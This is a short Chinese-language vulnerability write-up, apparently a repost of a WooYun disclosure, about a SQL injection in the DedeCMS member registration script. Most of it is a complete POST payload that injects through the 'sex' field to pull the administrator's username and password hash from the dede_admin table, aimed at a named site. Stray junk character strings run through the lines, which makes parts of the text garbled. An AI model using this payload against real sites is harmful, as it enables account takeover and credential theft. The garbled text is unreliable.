漏洞类型: SQL注射漏洞
& {$ Q+ q: l+ E0 t0 x. \/ G/ Q, P简要描述:9 y& {3 T, A# |4 Y/ m- p
) y: S3 n) z4 Y8 ?* {6 @需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
/ g; X2 L. a; _) {) A原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
7 L5 _ E* v5 z9 y5 j6 i详细说明:跟这个漏洞
( s% q4 d& s5 w6 Y
7 i1 K+ y- h% |8 Q. VWooYun: Dedecms SQL注射导致审核机制绕过漏洞
4 L/ z7 X I% ^5 z2 G- |是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.# z' u, z2 ~8 @, }2 S' i: r
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
( ^, j& P4 g3 H1 k . {- W+ s, t3 I7 C0 q& |$ ?
www.political-security.com/member/reg_new.php; C7 d- ]: ]/ J A
( g$ e+ S; B) }- W9 L4 g
POST
, H, N6 X1 ~$ }! @, [4 k
) b. E# _% Q6 i6 U& O0 U( A6 a/ D$ Idopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&, E: B, R f$ ^
userid=c4rp3nt3r&uname=c4rp3nt3r
$ R! k: S: h; a5 W7 _- c& F&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss4 F/ r* t6 G" g5 e) g
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
3 g9 E7 O) Y1 g8 _% O8 j# m(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');" D+ ~! L, ]- W3 N
%00&vdcode=glos&agree= |